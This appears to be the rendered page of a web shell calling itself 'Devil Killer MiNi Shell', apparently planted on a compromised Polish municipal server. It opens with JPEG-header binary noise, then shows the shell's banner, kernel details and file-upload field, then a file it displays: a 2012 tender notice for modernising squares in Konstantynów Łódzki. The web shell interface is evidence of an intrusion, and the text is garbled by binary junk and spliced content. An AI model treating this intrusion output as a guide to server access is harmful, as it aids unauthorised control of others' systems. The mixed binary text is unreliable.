JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/147389-N-2012.html

<p class="kh_header"><b>Konstantynów Łódzki: Modernizacja skwerów przy Pl. Kościuszki w Konstantynowie Łódzkim realizowana  w ramach Projektu -Rewitalizacja Centrum Konstantynowa Łódzkiego-</b><br>
<b>Numer ogłoszenia: 147389 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Zgierska 2, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 042 2111173, faks 042 2111168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.konstantynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja skwerów przy Pl. Kościuszki w Konstantynowie Łódzkim realizowana  w ramach Projektu -Rewitalizacja Centrum Konstantynowa Łódzkiego-.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie modernizacji skwerów przy pl. Kościuszki w Konstantynowie Łódzkim, inwestycji realizowanej w ramach Projektu -Rewitalizacja Centrum Konstantynowa Łódzkiego- współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO Województwa Łódzkiego na lata 2007-2013, Oś Priorytetowa: VI. Odnowa Obszarów Miejskich, Działanie: VI.1 Rewitalizacja obszarów problemowych, Umowa o dofinansowanie nr UDA-RPLD.06.01.00-00-024/11-00.
Zakres rzeczowy zamówienia obejmuje etapową przebudowę terenu pl. Kościuszki w Konstantynowie Łódzkim. Przedsięwzięcie inwestycyjne obejmuje modernizacją terenu o powierzchni ok. 11 600 m2 w zakresie modernizacji 4 skwerów położonych centralnie na działkach nr ewid.110-3, 110-7, 110-9, 110-5 obręb 12, kwartał ulic Łódzkiej, Jana Pawła II, Zgierskiej, Łaskiej. Skwery zostały oznaczone w dokumentacji techniczno-wykonawczej jako -plac A-, -plac B-, -plac C-, -plac D-, z uwagi na odmienny charakter i funkcje każdego z nich.
Każdemu ze skwerów został przypisany numer zadania, które będzie realizowane jako ustalony, wyodrębniony etap zamówienia, w terminie opisanym przez Zamawiającego:
Zadanie nr 1 - etap I -   plac B
Zadanie nr 2 - etap II -  plac A
Zadanie nr 3 - etap III - plac D
Zadanie nr 4 - etap IV -  plac C.
W roku 2012 Zamawiający przewiduje realizację zadania nr 1- etap I - plac B. Kolejność realizacji zadań nr 2,3,4 zostanie ustalona z Wykonawcą robót. 
Inwestycja obejmuje następujące roboty budowlane:
1) roboty w zakresie nawierzchni zewnętrznych (ciągi piesze, plac apelowy, podbudowa pod tramwaj)
2) roboty w zakresie robót elektrycznych (oświetlenie, przyłącza energetyczne)
3) roboty w zakresie odwodnienia nawierzchni
4) roboty budowlane w zakresie wod-kan. 
5) roboty w zakresie urządzania zieleni
6) roboty w zakresie małej architektury 
7) roboty w zakresie wyposażenia skwerów 
8) roboty budowlane w zakresie wyburzeń
Szczegółowe wymagania 
1. Szczegółowy opis prac i zakres ich wykonania zostały określone w dokumentacji technicznej: Projektach, Specyfikacjach Technicznych Wykonania i Odbioru Robót oraz w Przedmiarach stanowiących integralną część Specyfikacji Istotnych Warunków Zamówienia.   
2. Projekt organizacji robót i harmonogram rzeczowo-finansowy zostanie ustalony po podpisaniu umowy z wybranym Wykonawcą.
3.  Zamawiający zaleca przeprowadzenie wizji lokalnej, oględzin terenu realizowanej inwestycji pl. Kościuszki w Konstantynowie Łódzkim przed złożeniem oferty.
Wszelkie ewentualne nazwy własne urządzeń i materiałów użyte w dokumentacji projektowej są podane przykładowo i określają jedynie minimalne, oczekiwane parametry jakościowe oraz wymagany standard i mogą być zastąpione przez inne równoważne, jednak obowiązek udowodnienia równoważności, zgodnie z art. 30 ust. 5 ustawy Prawo zamówień publicznych należy do Wykonawcy. W związku z tym, w miejscach gdzie w specyfikacji istotnych warunków zamówienia, zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub wskazane normy, o których mowa w art. 30 ust. 1-3 ustawy PZP, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań  -równoważnych- pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.
Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone dokumenty, o których mowa wyżej, będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o przyjęciu oferty z powodu równoważności zaproponowanych zamienników.
Wymagania dotyczące prowadzonych prac: 
Do zadań Wykonawcy będzie należeć również:
1) Wykonawca opracowuje i ponosi z tym związane koszty projektu organizacji ruchu i zabezpieczenia robót,
2) Wykonywane roboty należy oznakowywać według opracowanego i zatwierdzonego projektu organizacji ruchu,
3) Do pracy można przystąpić po protokolarnym przekazaniu terenu i dopuszczeniu Wykonawcy do pracy
przez Zamawiającego,
4) Przed przystąpieniem do prac na budowie każdy pracownik powinien być przeszkolony w zakresie BHP 
i PPOŻ, co powinno być poświadczone odpowiednim dokumentem,
5) Prace należy prowadzić w sposób zgodny z przepisami obowiązującymi dla tego typu prac, a w
szczególności przestrzegać przepisów BHP i PPOŻ (Dz. U. Nr 13/72, poz. 93),
6) Wykonawca zabezpieczy na terenie budowy należyty ład, porządek, przestrzeganie przepisów BHP, 
ochronę znajdujących się na terenie urządzeń i sprzętu oraz utrzymanie ich w należytym stanie technicznym. Roboty budowlane będą wykonywane w sposób nie powodujący kolizji z funkcjonowaniem obiektów,
7) Wykonanie przedmiotu umowy z własnych materiałów zgodnie z posiadaną przez Zamawiającego dokumentacją projektową. Zastosowane materiały winny spełniać wymogi prawa budowlanego tj. posiadać odpowiednie certyfikaty na znak bezpieczeństwa, być zgodne z wymogami technicznymi Polskich Norm lub aprobatą techniczną, o ile dla danego wyrobu nie ustanowiono Polskiej Normy; wymagane są materiały atestowane i dopuszczone do stosowania,
8) Dokumenty wraz z ich kopiami powinny być przekazane do kontroli i wykorzystania inspektorowi nadzoru inwestorskiego w dniu sprowadzenia materiałów na plac budowy i przed wbudowaniem.
9) Prowadzenie dokumentacji: obmiary, rozliczenia, sprawozdania z zaawansowania robót, dokumentacja powykonawcza powinna być zgodna z wytycznymi inspektora nadzoru, 
10) Zgłaszanie inspektorowi nadzoru do odbioru robót ulegających zakryciu lub zanikających,
11) Zgłoszenie obiektu do odbioru końcowego oraz uczestniczenie w czynnościach odbioru, a także niezwłoczne usunięcie stwierdzonych wad i usterek,
12) Doprowadzenie do należytego stanu i porządku terenu budowy w terminie nie późniejszym niż w dniu odbioru końcowego robót,
13) Pełna odpowiedzialność za szkody wynikłe na terenie budowy w trakcie realizacji robót,
14) Uzgodnienie i potwierdzenie dokumentami ilości i właściwej utylizacji zdemontowanych materiałów.
15) Uzyskanie pozwolenia na użytkowanie - jeśli jest wymagane przez przepisy prawa,
16) Ubezpieczenie:
a) Wykonawca zobowiązany jest do zawarcia umów ubezpieczeniowych z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej w okresie od dnia rozpoczęcia robót do ich odbioru.
b) Ubezpieczeniu podlegają w szczególności: - roboty, urządzenia oraz wszelkie mienie ruchome związane bezpośrednio z wykonywaniem robót, w tym sprzęt, materiały i urządzenia przeznaczone do wbudowania - odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.23.33.00-2, 45.23.32.50-6, 45.23.13.00-8, 45.11.27.10-5, 45.31.10.00-0, 45.23.32.93-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w wysokości 45 000,00 zł. (słownie: czterdzieści pięć tysięcy złotych)
2. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wadium( w każdej z  dopuszczalnych form) może być wniesione przez jednego, kilku lub wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium odpowiadać będzie wymaganej w całości kwocie.
     W takim przypadku wnosząc wadium należy wskazać w imieniu kogo i tytułem jakiego postępowania 
     wadium jest wnoszone. 
 3. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, 
    że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r Nr 42, poz. 275).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
   Bank Spółdzielczy w Aleksandrowie Łódzkim  05 8780 0007 0000 0316 1000 0005 
5. Wadium zarówno w formie pieniężnej jak i w innej formie musi być wniesione przed upływem terminu do składania ofert, wskazanego w pkt. XIV. SIWZ a potwierdzenie należy dołączyć do składanej oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 
2 roboty budowlane, których zakres obejmował urządzanie przestrzeni publicznej lub drogowej wraz z infrastrukturą techniczną i obiektami użyteczności publicznej, w tym: roboty konstrukcyjno-budowlane, drogowe, instalacje sanitarne, instalacje elektryczne, zagospodarowanie terenu wraz z zakładaniem, pielęgnacją zieleni i małą architekturą, o wartości każdej z robót inwestycyjnych nie mniejszej niż 800 000 zł brutto każda.
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonywana metodą:-spełnia-nie spełnia- w oparciu o dokumenty, oświadczenia i informacje zawarte w ofercie. 
Z treści załączonych dokumentów, oświadczeń musi jednoznacznie wynikać, że stawiane warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub będzie dysponował: 
osobami zdolnymi do wykonania zamówienia dostępnymi Wykonawcy w celu realizacji zamówienia (potencjał kadrowy) 
Z powodu zróżnicowanego zakresu prac realizowanego Projektu, do udziału w postępowaniu zostanie dopuszczony wykonawca, który dysponuje osobami zdolnymi do wykonania zamówienia, z zakresu różnych specjalności i kwalifikacji w tym: 
1) co najmniej 1 osobą - pełniącą funkcję - kierownika zespołu budowy, posiadającą uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika budowy;
2) co najmniej 1osobą z uprawnieniami budowlanymi w specjalności drogowej, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz co najmniej 5 letnie doświadczenie w charakterze kierownika budowy lub robót;
3) co najmniej 1osobą z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz co najmniej 5 letnie doświadczenie w charakterze kierownika budowy lub robót;
4) co najmniej 1 osobą z uprawnieniami budowlanymi w specjalności instalacyjno - inżynieryjnej lub
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i 
kanalizacyjnych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i
kanalizacyjnych bez ograniczeń, lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz co najmniej 5 letnie doświadczenie w charakterze kierownika budowy lub robót;
5) co najmniej 1 osobą z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz co najmniej 5 letnie doświadczenie w charakterze kierownika budowy lub robót;
6) co najmniej 1 osobą posiadającą wykształcenie kierunkowe w zakresie architektura krajobrazu w specjalności ogrodnictwo lub leśnictwo i doświadczenie zawodowe minimum 5 letnie w zakresie 
prac zakładania i utrzymania terenów zieleni. 
Zamawiający dopuszcza, że osoby wykazane przez Wykonawcę do realizacji zamówienia, mogą spełniać więcej niż jedną funkcję, jeżeli dysponują wymaganymi uprawnieniami i doświadczeniem, t. j. pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji z wyjątkiem przypadków określonych w Prawie Budowlanym. Wykonawcy w trakcie wykonania zamówienia przysługuje prawo wymiany wskazanych osób delegowanych do wykonania zamówienia. W przypadku zmiany personelu, Wykonawca ma obowiązek wskazać osobę o takich samych lub wyższych kwalifikacjach określonych w ofercie. 
Zamawiający w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom Państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane (t. j. Dz. U. z 2010 r. Nr 243, poz. 1623 ze zmianami) oraz ustawy o zasadach kwalifikacji zawodowych nabytych w państwach członkowskich UE (Dz. U. z 2008 Nr 63 poz. 394 z p. zm.).
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonywana metodą:-spełnia-nie spełnia- w oparciu o dokumenty, oświadczenia i informacje zawarte w ofercie. 
Z treści załączonych dokumentów, oświadczeń musi jednoznacznie wynikać, że stawiane warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o sumie gwarancyjnej ubezpieczenia w wysokości co najmniej 1 000 000,00 zł.
Wykonawca spełni warunek, jeżeli wykaże ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na w-w kwotę,
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonywana metodą:-spełnia-nie spełnia- w oparciu o dokumenty, oświadczenia i informacje zawarte w ofercie. 
Z treści załączonych dokumentów, oświadczeń musi jednoznacznie wynikać, że stawiane warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, jeżeli ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
